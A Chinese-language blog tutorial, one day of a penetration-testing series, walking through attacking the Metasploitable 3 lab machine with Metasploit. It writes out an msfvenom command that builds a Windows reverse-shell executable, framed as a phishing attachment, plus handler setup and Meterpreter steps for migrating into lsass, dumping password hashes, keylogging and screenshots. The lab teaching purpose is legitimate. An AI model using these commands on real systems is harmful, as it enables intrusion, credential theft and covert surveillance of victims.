Day25 - 针对 Metasploitable 3 进行渗透测试(6) - 使用 Meterpreter

Meterpreter 指令

昨天介绍了 Meterpreter 的指令列表,今天带大家来实作。

我们测试的方法在攻击主机产 msfvenom 的後门,因为目标主机为 Windows 因此指令为:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=攻击主机IP LPORT=攻击主机监听port -f exe -o ~/test.exe

并透过 Python3 构造一个简单的 webserver,模拟情境为员工收到钓鱼信件之後,下载恶意附件,并开启该恶意档案,由下图可看到下载 test.exe。

透过 msfconsole 开启 exploit/mult/handler,

  1. msfconsole:开启 CLI 介面
  2. use exploit/multi/handler 使用监听模组
  3. set payload windows/shell/reverse_tcp:设定跟 msfvenom 所使用的 payload 一样
  4. set LHOST 172.28.128.6:设定攻击主机IP
  5. set LPORT 4444:设定攻击主机 port
  6. exploit:进行攻击

如上图看到C:\User\vagrant\Desktop 表示成功进入主机,此时输入 background,将这次的连线移到背景执行。

可从指令sessions查看目前正在背景执行的连线。

使用 session -u <id> 将指定的连线提升使用 Meterpreter,就可以使用 Meterpreter 的指令,透过 sessions 可以看到目前背景有两个连线状态。

透过 session -i <id> 可以进入指定的连线,进行操作。

系统资讯
sysinfo
可以提供目标主机的资讯,如作业系统、登入使用者帐号、主机名称。

取得使用者名称
getuid
要确认目前进入的使用者帐号,我们的目标取的最高使用者的权限。

查看目标硬碟与其他设备
show_mount
可以看到目标主机连接的硬碟大小与其他如 CD/DVD 等资料,由下图可看到挂载的C:\

查看目前空闲的时间
idletime
可以看到目前使用者处於非活动状态的总时间。

shell
进入指令模式,有时候没有办法执行 shell,因此要透别注意。

确认 process
ps

指定移动到特定的 process
migrate <id>

切换成管理员权限

找到 SYSTEM ,id 484 lsass.exe 使用管理者的权限,因此可以切换到这个 process。

migrate 484

切换权限,并且使用 hashdump

hashdump 可以取得 Windows SAM 资料库的内容,需要管理者的权限。

搜寻密码相关档案

测试 keyloagger

  1. 在受害主机开启 notepad
  2. 寻找指定的 process
    pgrep notepag
  3. 开始抓取
    keyscan_start
  4. 使用者输入任意字串
  5. 取得资料关闭
    keyscan_dump
    keyscan_stop

截图
screenshot


<<:  React Router

>>:  DAY 27:Chain of Responsibility,将实作透过串串乐串起来

Day07 - Login to Ptt

今天来处理登入的流程。 送出登入的方式很简单,使用WebSocketClient的send方法即可:...

[Python 爬虫这样学,一定是大拇指拉!] DAY22 - 实战演练:HTML Response - 抓取股票代码清单 (1)

承接上篇,抓日成交资讯时,我们得知道股票代码,那如果我想要有一个可以定时更新的股票代码清单,要去哪里...

D-9. Rails API-Only 实作 && House Robber

API Application Programming Interface的缩写,主要在I,一个接口...

[DAY 19]Gan

前言 在这个 GAN 到爆炸的年代,你能想到的东西我都可以拿出一个有 GAN 的 Paper 出来X...

Docker是什麽?用 Docker 建置环境有什麽优点呢?

简单来说 Docker 就是一个虚拟机,确保执行专案时的环境都一样。 毕竟影响程序执行成功或失败的变...